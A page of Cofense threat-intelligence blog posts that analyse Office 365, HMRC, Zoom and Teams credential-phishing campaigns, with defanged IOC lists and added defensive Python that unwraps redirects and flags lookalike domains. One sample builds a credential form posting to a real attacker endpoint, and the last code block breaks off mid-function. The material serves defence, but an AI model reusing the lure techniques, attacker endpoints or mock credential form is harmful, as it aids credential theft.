Threat Actors Bypass Gateways with Google Ad Redirects

By Dylan Main and Harsh Patel, Cofense Phishing Defense Center

The Cofense Phishing Defense Center (PDC) has observed a phishing campaign that attempts to steal Office 365 login credentials by luring employees to accept a new Terms of Use and Privacy Policy. This new campaign has been seen across multiple organizations and uses advanced techniques to garner employee login credentials, including a Google Ad Services redirect to fool email gateways.

Figure 1: Headers

The originating IP in the headers of this email showed that it was sent from a legitimate account with the ‘from’ address “info@jtpsecurity[.]co[.]za”. It appears this email address was compromised and then used to send the phish to multiple employees. The word “security” in the from address could potentially lull the user into trusting the email’s origin.

Figure 2: Email Preview

At first glance, the user will see “This message was sent with High Importance.” Again, the from address contains the word security and the subject talks about a “Recent Policy Change,” creating urgency to click and handle the matter immediately.

The email body talks about accepting the newly updated “Terms of Use & Privacy Policy.” Also, it notes how this new policy will affect personal data and discontinue all active services on the user’s account. Curious users will likely want to “Learn More.”

Figure 3 shows the URL embedded in both buttons, “Accept” and “Learn More”:

Figure 3: URL redirect of the buttons

As seen in the above figure, the threat actor has utilized a Google Ad Services redirect to pilot users to their phish. This suggests that the threat actor(s) may have paid to have the URL go through an authorized source. In turn, this easily bypasses secure email gateways and exposes employees to the phish.

Upon clicking on either button, users are redirected to a duplicate of the real Microsoft page at the URL:

hXXps://microsoftoffice-servicepolicy-onlineserver[.]comisys[.]host/common/oauth2-authorize

On this page users are presented with a pop-up of the privacy policy the email mentions. In this window there are two notable logos as well, a Microsoft logo and the user’s company’s logo, in a bid to make this page appear that much more legitimate. Scrolling through the text box you can see the Privacy Statement was taken from Microsoft’s website.

Figure 4: First Page of the phishing attack

After accepting the updated policy, the user is then redirected to a Microsoft login page, which impersonates the Office 365 login page. An employee who enters their credentials and clicks “Next” will have sent the Threat Actor(s) their Microsoft credentials and compromised their account.

Figure 5: Second Page (The actual phishing)

Following the login page, users find further reason to believe the update is legitimate, one more box saying, “We’ve updated our terms.” Upon clicking the “Finish” button, they’ll be all set.

Figure 6: Third Page (Post entering credentials)

Last step: users are redirected to the legitimate Microsoft page, their Service Agreement, to complete the scam. Nothing malicious here!

Figure 7: Final Page (Official Microsoft site)

LEARN MORE about the Cofense Phishing Defense Center. See how the PDC’s managed phishing response and remediation stops the phishing attacks that elude email gateways.

Indicators of Compromise:

Network IOC | IP
hxxps://www[.]googleadservices[.]com/pagead/aclk?sa=L&ai=C3seiJpC5XstooZGJBrPArsADp__a3lyH_4PTjAqoqKfonA8QASC7-_keYISV7IXcHaABzavQ-gPIAQmpAt6UwcHeNU0-qAMByANKqgTEAU_Q2dNvWCQ_LtumFUNLEz16PFVhg8cC3HmYEdlxma4KWUfGkvbdLFpKvCC92odSoiBTw9idw1iHRgreOTD1xyzoBBif4axm3JFTnekl_2_OeuLDQv0U_HzVVt10Iu5SkzsX6nGWyfUgPHIgJkxJqY4me8SG8d0nlmJ8PumQhJhze02bPmqEr4puzh2awPAoHoVPQ7QaXlbeJvf4W7Wexg1RGQ0EqMY8Z7YLfyh6tceagXiYGwWU1r3H9HuiISfj4G-RYYTABM-Sru2hAsAFBfoFBgglEAEYAJAGAaAGLoAHm9SvBYgHAZAHAqgHjs4bqAeT2BuoB7oGqAfw2RuoB_LZG6gHpr4bqAfs1RuoB_PRG6gH7NUbqAeW2BuoB8LaG9gHAMAIAdIIBggAEAIYGoAKAZALA5gLAcgLAYAMAeAS_6jY_crtxomjAdgTDg&ae=1&num=1&cid=CAMSeQClSFh3L5xTIDfFt35D8xjVEHFCYXr5NOlTRany4t_BBsFsAp3b7XCD0nSBKDirzhPVamy0H75uzx6gQxh5_rKDAlBAJWTUCf1Tqi6saFbojDtHd_R8dtCePj4ZvH0zHZWyRITLXvztggY2ibrWY9oLm5X8Wcuetvk&sig=AOD64_0L9hd4oCjDoroDTf6-7Fkon2bwsw&ctype=5&client=ca-pub-1169945711933407&adurl=https%3A%2F%2Fmicrosoftoffice-servicepolicy-onlineserver[.]comisys[.]host | 172[.]217[.]7[.]226
hxxps://microsoftoffice-servicepolicy-onlineserver[.]comisys[.]host/ | 198[.]23[.]137[.]146
All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

FedRAMP Authorization: Why ‘Moderate’ Matters

By Rose Ryan, Cofense Product Marketing Manager

FedRAMP, the federal program created to assess the security of cloud service providers (CSPs), saves time and cuts costs for U.S. government agencies that would otherwise conduct their own assessments. CSPs are granted authorizations at three impact levels: low (includes low-baseline and low-impact SaaS “li-SaaS”), moderate, and high, aligned to the impact levels based on NIST guidelines. While the high-impact level protects the most sensitive government data, the moderate-impact level meets the needs of many agencies. And the gaping chasm in requirements between moderate and low is revealing.

Why Cofense Didn’t Take the Low Road

Why make the financial commitment, endure a rigorous authorization process and establish a continuous monitoring program when we could have simply self-attested our security controls for a li-SaaS classification? Because Cofense is a security company that prioritizes providing the highest level of protection to our customers, and a low-level certification just wasn’t good enough. That is why Cofense PhishMe is in the process of achieving FedRAMP moderate status.

Moderate vs. Low Impact Levels

Got PII? Cofense Has You Covered

Cofense recognizes that our products and services handle our customers’ personally identifiable information (PII). That’s why we went all in to certify at the FedRAMP moderate level, complying with 325 stringent controls to secure our customers’ data according to confidentiality, availability, and integrity. A moderate FedRAMP authorized CSP has a far more stringent set of controls compared to a CSP with a low or li-SaaS ranking. See a list of controls here.

The impact level of a moderate service offering is based on the sensitivity of the data that an information system processes, stores, and transmits. Cofense opted for moderate FedRAMP compliance for our PhishMe solution. This required the establishment and documentation of a highly secure environment that will withstand comprehensive, rigorous review before we may engage with Federal agencies as a FedRAMP CSP.

Controls: The Numbers Say It All

Additional security controls are added as the levels progress to ensure that government data is adequately protected. High-level systems have 421 baseline controls, moderate-level systems have 325 controls, while low-level systems have only 125 controls and li-SaaS require a minimal 36 controls. Cofense opted for the moderate level, which will allow us to support a mass of government agencies.


Continuous Assurance with Cofense

With a moderate FedRAMP authorized solution, there is a strict security implementation as well as operational requirements that PII data be protected. With a li-SaaS implementation, there is no such assurance. And it doesn’t end there. FedRAMP requires that authorized CSPs engage in continuous monitoring after authorization is achieved. The authorization can be revoked if the CSP is found to be in non-compliance with FedRAMP requirements at any point. Cofense opted for a moderate FedRAMP authorization, embracing these strict requirements and ongoing monitoring to meet our customers’ security needs and assure their peace of mind. Cofense PhishMe just completed the security assessment review with the sponsoring agency and FedRAMP PMO, and we are now in the final stages of the authorization process.

Learn more: see how Cofense is participating in the FedRAMP program.


Invoice Themed Phishing Emails Are Spreading from Trusted Links

By: Kian Mahdavi, Cofense Phishing Defense Center

The Cofense Phishing Defense Center (PDC) is seeing continued growth in phishing attacks that harvest users’ credentials via genuine file-sharing websites; these attacks are being found in environments protected by Proofpoint’s Secure Email Gateway (SEG). A huge factor in this campaign is the confidence users have in emails containing the “trusted” Dropbox reference.

It is tricky for SEGs to keep up with attempts to spread phishing attacks and malware via sharing services such as Dropbox, ShareFile, WeTransfer, Google Docs, Egnyte and even SharePoint. Fortunately, a few of our clients’ users reported the phishing emails via the Cofense Reporter button.

The “traditional” methodology for attackers was to “break in.” Nowadays, they easily can “login,” thanks to sharing sites.

Figure 1 – Body of the email, showing how the success of this attack depends on user interaction

The spear phishing attack sends a link requesting users to access a purchase order form with a (.pdf) extension. Upon clicking, the attack automatically redirects the user to their default web browser, requesting to click the “Download” button. The website will begin the download inside the “Downloads” folder. Nothing sinister going on, right?

The sender address’s domain – “actionsportsequipment[.]com” – coincidentally relates to the nature of the client’s industry; this demonstrates the extent the attackers went to in a bid to slip through the “secure” environment. One must ask oneself: “Was I expecting this transfer?” and “Am I expecting to receive a purchase order from this sender?”

Moreover, since the emails have been authenticated against Dropbox’s internal servers, the emails pass basic email security checks such as DKIM and SPF.

Figure 2 & 3 – Downloadable purchase order file

Once the download has been completed, the user is prompted to open the (.html) link, assuming the “purchase order” form will appear; however, upon clicking, the campaign redirects the user to a supposed “Microsoft” login page.

In this case, the attackers used the free website builder “Weebly.com” … yet another legitimate source, further deceiving the security measures in place with trusted redirect domains and IPs that will naturally continue to be white-listed and deemed “safe,” since millions of users share data with one another on a daily basis.

For this reason the padlock icon appears in the address bar, providing not only transport encryption for both parties but also the illusion that the website itself is “secure.”

Figure 5 – Phishing site built by Weebly

Once credentials have been supplied, the campaign redirects the user to the authentic ‘office[.]com’ webpage, which could even be enough to assure users it was a genuine procedure. A user’s personal data could potentially be in the hands of the threat actor, assuming they logged in with their true Microsoft credentials.

Figure 6 – Redirect to Microsoft Office webpage  

Indicators of Compromise:

Network IOC | IP
hXXps://www[.]dropbox[.]com/l/AADOPQGXtuDK03QYuvJqI0MbDlDxBTV28Cs | 162[.]125[.]6[.]1
hXXps://www[.]dropbox[.]com/l/AAAtWq-LVZcqXBnFLinUi9rB3LpEijuPo78 | 162[.]125[.]6[.]1
hXXps://helpsupport0ffice20[.]weebly[.]com/ | 199[.]34[.]228[.]53, 199[.]34[.]228[.]54



Practitioners Report the Need for Layered Email Security

By: Edward Amoroso, CEO and Analyst, TAG Cyber

In a recent survey, a majority of practitioners agreed on the need for protection that augments email gateways to deal with phishing attacks.

As phishing has become more prevalent and sophisticated, security experts have focused more on securing endpoints and email, the latter being the simplest way into an organization’s network. While cyber security teams have numerous defensive controls, according to a recent industry survey conducted jointly by TAG Cyber and Cofense, experts agree that deployed controls such as secure email gateways (SEGs) are necessary as a first line of defense but, on their own, aren’t sufficient to keep attackers from exploiting the endpoint.

On July 22, 2020, TAG Cyber and Cofense will present a webinar to discuss the survey results and present phishing defense strategies for companies who want to increase their efficacy against phishing attacks. You can learn more about the webinar and register here.

The survey asked security practitioners to answer the following question: Our security team sees phishing emails get past our Secure Email Gateway (SEG) at the following rate:

  1. Never
  2. Daily
  3. Weekly
  4. Monthly
  5. Hourly

Conducted by email and web and targeted at mid-to-senior level security practitioners, the survey concluded that 50% of organizations report that phishing emails bypass deployed SEGs daily. One respondent, the Chief Information Security Officer of a major financial institution, replied, “SEGs are getting much better at blocking emails with links and forms, but spam asking for money or hardware or simply probing for valid email addresses still get through at a daily rate.”

Another respondent, also a CISO at a financial firm responded, “Phishing emails will always get through. I don’t think any SEG is going to be 100% effective, or even 75%, because there are so many variables that can be changed to evade detection. We accept this to be true, and therefore have other controls…that can block access to the links once clicked, isolation that can render pages inert, or visual cues to indicate to the employees that the e-mail might not be safe.”

The remaining 50% of respondents reported that phishing emails bypass SEGs weekly (26%) and monthly (24%). Frank Abelson, President of Navitend, which provides managed services, including security to business and government customers, agreed that a layered approach is recommended. “Many of our clients combine gateway solutions with additional controls such as training to protect their inboxes from phishing,” he said.

Aaron Higbee, CTO of Cofense, sees this as an opportunity. “We have known for years that human detection combined with automation is necessary to protect employees from phishing attacks,” he said. “We are not surprised that this TAG Cyber survey found attacks leaking into enterprise inboxes.”

To learn more about the survey’s results and layered phishing defenses, register for the webinar.



HMRC latest target in global COVID relief phishing campaigns

By Jake Longden, Cofense Phishing Defense Center

Taxes and rebates have long been some of a phisher’s favorite targets. Now the coronavirus has provided a fresh new way to exploit this topic: the government grants designed to help small businesses and those out of work due to the pandemic.

The Cofense Phishing Defense Center (PDC) has observed a new phishing campaign in the U.K. that aims to harvest HMRC (Her Majesty’s Revenue and Customs) credentials and sensitive personal information by preying on employees who are expecting COVID relief grants.

With multiple world governments providing such grants, this is an easily modifiable tactic—simply modify the email to spoof the target country’s tax service.

Figure 1: Email Header

To add authenticity to the email, the threat actors have used an email address (hmrc@hotmail.com) with the impersonated organization in the name and set the name to match (HM Revenue & Customs). That, combined with the subject line, is a great way to attract the user’s interest (“Helping you during this covid from government”). Whilst this sentence is not using the greatest grammar, who wouldn’t want government assistance during these difficult times?

Figure 2: Email Body

When first viewing the email, the user is presented with a notification that the government is offering between £2500 and £7500 in tax grants for those whose work has been affected by the virus. The email includes a link to check their eligibility. With the government publicly and repeatedly mentioning such sums,  the email is believable to inattentive users. The attacker also mentions the “Open Government License v3.0,” a legitimate copyright license used by the Government and Crown Services, to provide additional credibility.

Figure 3: Phishing Page

Once the link is clicked, the user is presented with a realistic clone of the GOV.UK website. This may alleviate concerns a user may have and provide a false sense of security, as the page is extremely similar to the HMRC account sign-in page. The biggest red flag: the URL, just-bee.nl, is not relevant.

Figure 4: Phishing Page

Figure 5: Phishing Page

Here the user is asked to enter some very personal and sensitive data. Another sign that this is a scam: the volume and sensitivity of data requested far exceeds what is required to sign into a legitimate account. The data requested here screams “identity theft/impersonation.”

From there, the user is directed to a page that seems to be loading, to help provide the impression that the data is being processed and an eligibility check performed.

Figure 6: Processing Page


Network IOC | IP
hXXps://www[.]lagesports[.]com/[.]tmb/xml[.]php | 69[.]10[.]32[.]186
hXXps://rtoutletpremium[.]com[.]br/[.]well-known/pki-validation/UTR/index[.]php | 162[.]241[.]182[.]5


How Cofense Can Help

Visit Cofense’s Coronavirus Phishing Infocenter to stay up to date as threats evolve. Our site is updated with screenshots and YARA rules as we continue to track campaigns.


New Covid-19 Phish Abuses Tax Relief Act to Steal Credentials

By Ashley Atkins, Cofense Phishing Defense Center

For the past few months, the Cofense Phishing Defense Center (PDC) has observed numerous phishing campaigns associated with the coronavirus (COVID-19) pandemic.  These COVID-19-themed phish come in various forms and tend to prey on those fearful of contracting the disease as well as those who are in dire need of economic relief. Recently, the PDC identified a unique version that deserves an overview.

For this attack the user received a malicious email impersonating the US Department of Revenue with the subject: CARES Relief Certificate. The message body references information regarding the 2019 185 Act that has received attention in media outlets and social platforms. Research into the Act suggests it is highly likely the attacker copied that information from a website, made minor changes and created this phishing email, as seen in Figure 1 below.

Figure 1: Email Body

At a glance, this email simply informs users of the tax provisions adopted from the CARES Relief Act and outlines the details regarding it. It also mentions a deadline for applying, and that in order to apply users must fill out an attached secure document. One thing to note, this email arrived a few days after the stated deadline in the email. This may be intentional on the threat actor’s part in order to instill a sense of urgency in users – “you’re late and the deadline has passed!” However, some users may be pressed enough to attempt to apply, thinking it is worth a shot if it could mean receiving relief during this pandemic.

Many obvious red flags are present in this email. Besides the unsightly format, grammatical errors and random property address, the most evident red flag is the sender’s address. The attacker has abused AWeber’s email marketing service. AWeber’s use of SenderID authentication results in the “From” line showing as “Department of Revenue <state=lrs-gov[.]tk[@]send[.]aweber[.]com> on behalf of Department Of Revenue <state[@]lrs-gov[.]tk>”. When reviewing the domain, it seems to read as “Irs” (IRS), but the first letter is actually a lower-case L. The use of the .tk top-level domain (TLD) is worth noting as well. This TLD is the country code for a New Zealand territory called Tokelau. It is also free and one of the top TLDs used in phishing attacks.

Should users go so far as to download and open the “secure” HTML attachment, they are presented with a typically formatted Microsoft login page. This may appear odd, as the threat actor has impersonated a well-known and trusted entity such as the US Department of Revenue.

The fake Microsoft login page prompts for the standard username and password.

Figure 2: Phishing Page

Once credentials are submitted, a PHP script sends the stolen information to the attacker. The HTML’s source code attempts to bypass URL detection by using base tags that split the malicious URLs into two sections, so the full exfiltration URL never appears as a single string in the file.

Figures 3-5: Source Code
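The base-tag split described above is a detection-evasion trick against scanners that look for complete URL strings; a browser, however, always resolves the relative form action against the base. The following is an added defensive example, not code from the Cofense post: it resolves URLs the way a browser would so that the real destination host can be matched against an IOC list. The HTML sample is constructed to mirror the technique (the host is the post's defanged IOC, refanged only for parsing; the script path is invented).

```python
"""Resolve URLs that an HTML credential-phish attachment splits across a
<base href> tag and relative form/script references.

Added defensive example; not code from the Cofense post. The HTML below is
constructed to mirror the technique the post describes.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Tag/attribute pairs that carry URLs worth resolving (illustrative subset).
URL_ATTRS = {("form", "action"), ("script", "src"), ("a", "href"),
             ("img", "src"), ("iframe", "src")}


class BaseResolver(HTMLParser):
    """Record the first <base href> and every URL-bearing attribute."""

    def __init__(self):
        super().__init__()
        self.base = None
        self.refs = []          # (tag, raw attribute value)

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "base" and attrs.get("href") and self.base is None:
            self.base = attrs["href"]   # browsers honour only the first <base href>
        for t, a in URL_ATTRS:
            if tag == t and attrs.get(a):
                self.refs.append((tag, attrs[a]))


def resolve_urls(html, document_url="file:///attachment.html"):
    """Return [(tag, absolute_url)] as a browser opening the attachment would."""
    parser = BaseResolver()
    parser.feed(html)
    base = urljoin(document_url, parser.base) if parser.base else document_url
    return [(tag, urljoin(base, ref)) for tag, ref in parser.refs]


def remote_hosts(html):
    """Hosts the attachment would contact, for matching against IOC lists."""
    return sorted({urlsplit(u).netloc for _, u in resolve_urls(html)
                   if urlsplit(u).scheme in ("http", "https")})


def refang(text):
    """Turn the post's defanged '[.]' notation back into a real dot."""
    return text.replace("[.]", ".")


# Constructed sample attachment (hypothetical markup). No complete "http..."
# string appears in the form tag, which is what defeats a naive URL scanner.
SAMPLE_HTML = refang("""
<html><head><title>Sign in</title>
<base href="https://youdiaddy[.]ml/api/">
</head><body>
<form method="post" action="api.php?">
  <input name="login"><input name="passwd" type="password">
  <button type="submit">Sign in</button>
</form>
<script src="../assets/check.js"></script>
</body></html>
""")

if __name__ == "__main__":
    for tag, url in resolve_urls(SAMPLE_HTML):
        print(f"{tag:7s} -> {url}")
    print("hosts:", remote_hosts(SAMPLE_HTML))
```

Run against a real reported attachment, `remote_hosts()` is what you feed to the blocklist or IOC lookup; note that the same HTML without the `<base>` tag resolves to a harmless `file://` path, which is exactly why a string-matching scanner sees nothing.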

Network IOC | IP
hxxps://youdiaddy[.]ml/api/api[.]php? | 192[.]236[.]194[.]247
hxxps://ijodaddy[.]cf/api/api[.]php? | 23[.]254[.]230[.]115



Zoom Phish Zooming Through Inboxes Amid Pandemic

By Ashley Tran, Cofense Phishing Defense Center

The Cofense Phishing Defense Center (PDC) has observed a new phishing campaign that acts as a Zoom video conference invitation to obtain Microsoft credentials from users.

As noted in numerous other articles posted by Cofense, it is no secret this pandemic has changed the threat landscape. From emails to employees regarding safety guidelines to the latest news from the WHO or CDC on Coronavirus cases in the area, threat actors have done it all to make the most of this situation, especially targeting remote workers. Within that group of remote workers there are users who are unfamiliar with teleconferencing and the emails that come with using the service. Some users may not have the best home office setup and work on monitors that barely afford them a proper view, making it difficult to look over these emails closely. The attack covered below is specifically aimed toward those users.

Figure 1– Email Bodies

For this attack, users are informed of an invite to a video conference from what appears to be “Zoom Video Communications” which is followed by either as noted in Figures 1-2. For now, this all appears to be in order; however, looking more closely at the senders, there are barely noticeable typos: “communcations” missing an ‘i’, “confrence” missing an ‘e’. While this may seem like just an innocuous mistake, it’s in fact a carefully crafted scheme.

Mere hours before sending this email, the threat actors registered the domains zoomcommuncations.com and zoomvideoconfrence.com, as noted in Figures 3-4.

Figure 2-3: Email Body

When visiting either domain, it may appear to be a German site speaking on different Lasik treatments and surgery options. However, this is merely a cover for its true purpose of helping send malicious emails while impersonating teleconferencing giant Zoom.

The email itself is reminiscent of a legitimate Zoom communication: the blue Zoom logo, a vague mention of a video conference for users to join and a link for them to review said invitation; it’s inconspicuous enough and mostly free of the grammatical mistakes phish often contain.

Hovering over the “Review Invitation” the link shown is:

hxxps://r[.]smore[.]com/c?u=pastell[.]in/ca07-b36n5-65m-c53b-o26v-62h-e79-t56e-c44=REDACTED[@]company[.]com

For this attack, the threat actor used a redirector link from Smore, a newsletter creation and distribution website. This is not the first time threat actors have used a legitimate online service’s personal redirect links to pilot users to malicious sites. In this case, this redirect link, once clicked, navigates users to:

hxxp://www[.]pastell[.]in/ca07-b36n5-65m-c53b-o26v-62h-e79-t56e-c44

Which then redirects to the final page:

hxxps://logonmicrosftonlinezoomconference[.]azureedge[.]net/

For this attack, the threat actor has utilized Microsoft’s Azure to host the phishing domain, but this is not a new tactic. Threat actors flock to these domain hosting services due to some of the perks they offer. With this service, a free SSL certificate comes with any website hosted through it, which adds a padlock next to the URL in the address bar; most people incorrectly assume this indicates a site is legitimate. Another benefit of Azure is the customization option for the subdomain, allowing a URL to mimic, or at least appear as, a legitimate URL for the service the attack is attempting to impersonate. In this case, the subdomain is “logonmicrosftonlinezoomconference”, with all the keywords most users would expect to see in a Zoom email that goes to a Microsoft login page: “logon microsoft” and “zoom conference”. With both a padlock in the address bar and relevant names displayed, this attack becomes less noticeable to most users.
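Three observations from these posts can be turned into one static triage step: the Google Ad Services redirect (the `adurl` parameter in the first post's IOC), the Smore redirector (the `u` parameter above), and the keyword-stuffed, typo-squatted Azure subdomain. The following added defensive example, which is not code from the Cofense posts, unwraps the destination carried inside a redirector URL without touching the network and then scores the landing hostname for brand words and one-letter near-misses such as “microsft”. The redirector parameter names come from the IOCs; the brand-token list, the legitimate-domain list and the shortened sample URLs are assumptions constructed for the demo.

```python
"""Unwrap trusted-redirector URLs and score the landing hostname for brand
keywords and near-miss spellings.

Added defensive example; not code from the Cofense posts. The redirector
parameter names ('adurl' on googleadservices.com, 'u' on r.smore.com) are
the ones visible in the posts' IOCs; everything else is assumed/constructed.
"""
from urllib.parse import urlsplit, parse_qs, unquote

# Redirector host -> query parameter that carries the real destination.
REDIRECTORS = {
    "www.googleadservices.com": "adurl",
    "r.smore.com": "u",
}
# Words a defender expects only on the brand's own domains (assumption).
BRAND_TOKENS = ("microsoft", "office", "zoom", "logon")
# Domains on which those tokens are legitimate (assumption, illustrative list).
LEGIT_SUFFIXES = ("microsoft.com", "microsoftonline.com", "office.com", "zoom.us")


def refang(text: str) -> str:
    """Convert defanged IOC notation (hxxps, [.], [@]) back into a parseable URL."""
    return (text.replace("[.]", ".").replace("[@]", "@")
                .replace("hxxp", "http").replace("hXXp", "http"))


def unwrap_redirect(url: str, max_hops: int = 5) -> list:
    """Statically follow embedded-destination parameters (no network access).

    Returns the chain of URLs, starting with the input. Only hops whose target
    is carried in the URL itself are recoverable; a server-side redirect
    (pastell.in -> azureedge.net in the post) is invisible to this function.
    """
    chain = [url]
    for _ in range(max_hops):
        parts = urlsplit(chain[-1])
        param = REDIRECTORS.get(parts.netloc.lower())
        if param is None:
            break
        values = parse_qs(parts.query).get(param)
        if not values:
            break
        target = unquote(values[0])
        if "://" not in target:        # Smore passes a bare host/path
            target = "https://" + target
        chain.append(target)
    return chain


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance; used to catch one-letter typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def brand_hits(host: str) -> list:
    """Brand tokens present in a hostname, exactly or within one edit.
    Near-miss matching only applies to tokens of six+ letters to limit noise."""
    host = host.lower()
    hits = []
    for tok in BRAND_TOKENS:
        if tok in host:
            hits.append(tok)
        elif len(tok) >= 6:
            for width in (len(tok) - 1, len(tok), len(tok) + 1):
                if any(levenshtein(host[i:i + width], tok) == 1
                       for i in range(len(host) - width + 1)):
                    hits.append(tok)
                    break
    return hits


def is_legit(host: str) -> bool:
    return any(host == s or host.endswith("." + s) for s in LEGIT_SUFFIXES)


def assess(url: str) -> dict:
    """Unwrap, then report on the landing host. 'suspicious' means the landing
    host carries brand words but is not one of that brand's own domains."""
    chain = unwrap_redirect(refang(url))
    landing = urlsplit(chain[-1]).netloc.lower()
    hits = brand_hits(landing)
    return {"landing_host": landing, "hops": len(chain) - 1,
            "brand_tokens": hits, "suspicious": bool(hits) and not is_legit(landing)}


# Constructed samples: shortened forms of the IOCs in the posts, plus one
# legitimate control URL.
SAMPLES = [
    "hxxps://www[.]googleadservices[.]com/pagead/aclk?sa=L&ai=EXAMPLE"
    "&adurl=https%3A%2F%2Fmicrosoftoffice-servicepolicy-onlineserver[.]comisys[.]host",
    "hxxps://r[.]smore[.]com/c?u=pastell[.]in/ca07-b36n5-65m-c53b-o26v-62h-e79-t56e-c44",
    "hxxps://logonmicrosftonlinezoomconference[.]azureedge[.]net/",
    "https://login.microsoftonline.com/",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(assess(sample))
```

The point of unwrapping first is that a reputation lookup on `googleadservices.com` or `r.smore.com` will always come back clean; the gateway has to evaluate the `landing_host`. The Smore sample lands on `pastell.in` with no brand tokens, which shows the limit of static unwrapping: the final hop in that chain is a server-side redirect, so detonating or fetching the URL in a sandbox is still needed to reach the Azure-hosted page.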

Figure 4: Phishing Page

Figure 5 shows the phishing page users are presented with should they make it this far. The page is a generic Microsoft phish with an accompanying URL which, once again, seems to legitimize the phish to users.

The request is simple: “Sign in to Zoom with your Microsoft 365 account.” At face value, this seems like a completely reasonable use of credentials. And since Zoom allows users to log in via SSO and most companies have linked Microsoft credentials to the platform, some users may even be familiar with Microsoft helping to access their Zoom account.

Meanwhile, with the user’s email appended in the URL, it in turn pre-populates the username field with that information, leaving only the password left for the user to provide.

Network IOC | IP
hxxps://r[.]smore[.]com/c?u=pastell[.]in/ca07-b36n5-65m-c53b-o26v-62h-e79-t56e-c44?e5=REDACTED[@]company.com | 52[.]27[.]29[.]106
hXXp://www[.]pastell[.]in/ca07-b36n5-65m-c53b-o26v-62h-e79-t56e-c44 | 209[.]159[.]154[.]74
hXXps://logonmicrosftonlinezoomconference[.]azureedge[.]net/ | 13[.]107[.]246[.]10

New Phishing Scam Targets Teleworkers with Bogus Microsoft Teams Notification

By: Kian Mahdavi, Cofense Phishing Defense Center

With the influx of remote workers, it’s a perfect opportunity to flood people’s inboxes with malicious emails and fake links. The Cofense Phishing Defense Center (PDC) recently uncovered a phishing campaign that targets employees to harvest their Microsoft credentials. Ironically, the phish was found in an environment protected by Microsoft’s own secure email gateway (SEG). The phishing email, which was reported to the PDC using the Cofense Reporter button, included a well-thought-out “AudioChat” notification link supposedly from Microsoft Teams.

Teams is one of the most popular platforms for remote employees. Predictably, the threat actors have taken this into consideration – especially during the COVID-19 pandemic with millions of people teleworking. We expect this trend to continue with similar communication platforms.

Figure 1: Email Body of an official Microsoft Teams example notification

Figure 2: Email Body of illegitimate Microsoft Teams notification

Credit where credit’s due: the threat actor’s social engineering is of high quality. The subject line reads “Chat Message in Teams”. Is this just an ordinary notification?

The email closely mirrors Microsoft’s own notification: matching font size and color, the same overall layout, and the generic ‘tips’ section towards the bottom of the message, evident in Figure 2. Despite that effort, there are a few tell-tale signs this is a phish. The most obvious is the sender’s lengthy spoofed email address:

matcnotification[.]teamadmin_audidsenderderweeu44we7yhw[@]ssiconstructionnw[.]com

The words “notification” and “teamadmin” have been skilfully included in the local part of the address. More importantly, the sending domain, ssiconstructionnw[.]com, does not contain the all-important ‘Microsoft’ reference. No prize for guessing: it belongs to a construction company located in Seattle, Washington, whose domain the attacker has spoofed. Because the domain is a real one, the message passes basic email authentication checks such as SPF and DKIM, and the landing page is served over HTTPS, displaying the green padlock to the left of the URL (Figure 3). Neither fact says anything about who sent the message or who controls the page; they show only that the domain and the TLS certificate are valid, which is all the threat actor needs to borrow their credibility.

On top of that, the text reads “Teammate sent you an offline message,” using the generic word “teammate” rather than the sender’s name. Contradicting that, the avatar carries the initials (JC) of the supposed sender, which further undermines the email’s legitimacy and should raise suspicion.

As mentioned above, the user is asked to click on the “16 second AudioChat,” which on hover displays the following link:

hXXps://us19[.]campaign-archive[.]com/?u=0dce22c9638fc90b5c17ea20a&id=6652f42d20

The user’s email address (now redacted) was embedded in the above URL. Many organisations deploy URL-rewriting email protection, so hover links are often wrapped in security-sounding prefixes; in this campaign the hover link began with “safelinks.protection”, the Microsoft Safe Links rewriting domain. An inquisitive reader who recognises that prefix may overlook the rest of the URL and click, even though the rewriting only means the gateway will scan the link, not that it is safe.
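The wrapping described above can be undone offline before anyone clicks. The following Python is an added example, not code from the Cofense post: it reads the destination out of the query string of known wrapper hosts (Safe Links and the kind of mailing-list redirector that appears in the IOCs earlier on this page), reports the host the user would actually land on, pulls out any recipient address smuggled into the link, and defangs the result for an IOC list. The wrapper host and parameter tables and the two sample links are assumptions constructed for the example.

```python
# Added example (not part of the Cofense post): unwrap URL-rewriting and
# redirector links offline so the real landing host, and any recipient
# address smuggled into the link, is visible before anyone clicks.
# Assumptions: Safe Links carries the destination in a `url` parameter and
# the other wrappers in one of REDIRECT_PARAMS; extend both tables to match
# the wrappers seen in your own mail flow.
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Hosts that only ever forward somewhere else (assumed list).
WRAPPER_HOSTS = (
    "safelinks.protection.outlook.com",   # Microsoft Safe Links
    "r.smore.com",                        # mailing-list click tracker
    "googleadservices.com",               # ad click redirect
)
# Query parameters those wrappers use for the destination (assumed list).
REDIRECT_PARAMS = ("url", "u", "adurl", "q", "target", "redirect")

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def is_wrapper_host(host):
    host = host.lower()
    return any(host == w or host.endswith("." + w) for w in WRAPPER_HOSTS)


def unwrap_url(url, max_hops=5):
    """Return the chain of hops, original URL first, landing URL last.

    Nothing is fetched: each hop is read out of the previous hop's query
    string, so the analyst never touches attacker infrastructure."""
    hops = [url]
    for _ in range(max_hops):
        parts = urlsplit(hops[-1])
        host = parts.hostname or ""
        params = parse_qs(parts.query, keep_blank_values=True)
        nxt = None
        for name in REDIRECT_PARAMS:
            value = params.get(name, [""])[0]
            # Follow the parameter only on a known wrapper host, or when the
            # value is plainly an absolute URL. A bare "u=<id>" on the final
            # page (a mailing-list archive id, say) must not be followed.
            if value and (is_wrapper_host(host)
                          or value.lower().startswith(("http://", "https://"))):
                nxt = value
                break
        if nxt is None:
            break
        if "://" not in nxt:
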